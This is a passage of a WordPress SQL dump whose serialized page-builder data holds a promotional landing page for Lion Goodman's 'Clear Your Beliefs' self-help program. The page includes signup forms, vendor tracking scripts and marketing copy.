src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><br><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1390, 1831, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1881:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1222:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><br><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1391, 1832, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1392:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p"><center><strong>Download the free eBook.</strong></center>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div>\n<div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1934:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1"><center><strong>DOWNLOAD the FREE APP</strong></center></p>\n<p class="tri-panel-p tri-panel-2nd-p-2"><center>Start Clearing Whatever Is In The Way Right Now!</center></p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n\n<div class="form-input-container-button" style="bottom: -5px !important; position: relative;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1272:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="bottom: 4.6px !important; position: relative;"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
